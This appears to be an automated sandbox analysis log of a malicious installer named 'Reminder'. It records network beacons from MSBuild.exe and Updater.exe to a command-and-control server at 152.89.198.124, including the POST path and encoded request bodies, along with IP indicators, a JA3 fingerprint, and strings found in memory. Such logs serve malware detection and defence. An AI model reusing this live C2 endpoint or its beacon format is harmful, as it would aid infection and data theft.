Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 152.89.198.124 152.89.198.124
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NEXTVISIONGB NEXTVISIONGB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.126.163
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.126.163
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.22
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.22
Source: unknown TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074D935 InternetReadFile,SetEvent,GetLastError,SetEvent, 35_2_0074D935
Source: unknown HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.php
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001418000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phped
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phpp
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cscasha2.ocsp-ce
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.us
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: Updater.exe, 0000001C.00000000.1722434360.00000000007A5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000000.2362895220.0000000000D45000.00000002.00000001.01000000.0000000D.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jrsoftware.org/
Source: Reminder.exe, 00000000.00000000.1678698708.0000000000861000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jrsoftware.org0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: Reminder.exe, 00000000.00000003.1680434117.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Reminder.exe, 00000000.00000003.1680920376.000000007F2BB000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000000.1682457089.0000000000A41000.00000020.00000001.01000000.00000004.sdmp, Reminder.tmp, 00000003.00000000.1688593494.0000000000F1D000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.innosetup.com/
Source: Reminder.exe, 00000000.00000003.1680434117.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Reminder.exe, 00000000.00000003.1680920376.000000007F2BB000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000000.1682457089.0000000000A41000.00000020.00000001.01000000.00000004.sdmp, Reminder.tmp, 00000003.00000000.1688593494.0000000000F1D000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.remobjects.com/ps
Source: unknown Network traffic detected: HTTP traffic on port 57886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57962 -> 443
